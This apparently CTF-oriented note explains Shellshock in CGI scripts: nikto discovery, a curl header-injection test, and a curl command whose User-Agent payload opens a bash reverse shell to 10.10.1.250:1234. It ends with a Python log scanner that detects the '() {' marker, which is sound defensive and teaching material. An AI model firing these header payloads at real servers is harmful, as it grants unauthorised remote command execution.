Shellshock

Finding the Vulnerability

First you need to find a script (.sh, .pl, .cgi, etc.), most commonly under the cgi-bin folder; for this task the best tool is nikto:

nikto -h <IP>

Testing the Vulnerability

If the response contains the “vulnerable” output, the server is vulnerable:

kali@kali#~ curl -H "User-agent: () { :;}; echo; echo vulnerable" http://10.0.30.121/cgi-bin/uptime
vulnerable

User-Agent

Next, with curl we can abuse the outdated legacy bash version, which executes the command appended to the header value:

curl -i -H "User-agent: () { :;}; /bin/bash -i >& /dev/tcp/10.10.1.250/1234 0>&1" http://10.0.30.121/cgi-bin/uptime

Examples: ECHO CTF legacy

It is also possible to abuse this vulnerability through the “Referer” HTTP header instead of “User-Agent”.
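From the defender's side, both header variants above leave the same trace in a web server log: the bash function-export marker "() {" inside the User-Agent or Referer field. The following detector is an added example (not code from the original post): it parses Apache/nginx "combined" format access log lines and flags entries whose User-Agent or Referer carries that marker. The log lines are constructed samples, and the log format, field names and the 10.0.30.x addresses are assumptions for illustration.

```python
import re

# Apache/nginx "combined" log format (assumed):
# ip - user [time] "request" status bytes "referer" "user-agent"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Shellshock-style function export marker: "()" followed by optional
# whitespace and "{", as seen in the payloads above.  Whitespace is made
# optional so that "(){" variants are caught as well.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{')


def is_shellshock_header(value):
    """Return True if a header value carries the function-export marker."""
    return SHELLSHOCK_RE.search(value) is not None


def find_shellshock(log_lines):
    """Scan combined-format log lines; return one hit per suspicious header.

    Each hit records the source IP, the request line and which logged
    header (agent or referer) carried the marker.  Lines that do not match
    the combined format are skipped rather than treated as hits.
    """
    hits = []
    for line in log_lines:
        m = COMBINED_RE.match(line.rstrip("\n"))
        if not m:
            continue
        for field in ("agent", "referer"):
            if is_shellshock_header(m.group(field)):
                hits.append({
                    "ip": m.group("ip"),
                    "request": m.group("request"),
                    "field": field,
                })
    return hits


# Constructed sample log lines (not real traffic): a probe via User-Agent,
# a benign request, and the same probe via Referer.
SAMPLE_LOG = [
    '10.0.30.5 - - [24/Sep/2014:10:00:01 +0000] "GET /cgi-bin/uptime HTTP/1.1" '
    '200 512 "-" "() { :;}; echo; echo vulnerable"',
    '10.0.30.6 - - [24/Sep/2014:10:00:02 +0000] "GET /index.html HTTP/1.1" '
    '200 1024 "-" "Mozilla/5.0"',
    '10.0.30.7 - - [24/Sep/2014:10:00:03 +0000] "GET /cgi-bin/uptime HTTP/1.1" '
    '200 512 "() { :;}; echo; echo vulnerable" "curl/7.38"',
]

if __name__ == "__main__":
    for hit in find_shellshock(SAMPLE_LOG):
        print(f"{hit['ip']} {hit['field']:<8} {hit['request']}")
```

Only the headers the server actually writes to its log are visible this way; with the combined format that is User-Agent and Referer, so other headers reaching a CGI script need inspection at the request level (a WAF rule or a logging format that records them). The marker regex is deliberately loose; a legitimate User-Agent essentially never contains "() {", so false positives are rare and each hit is worth a look.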
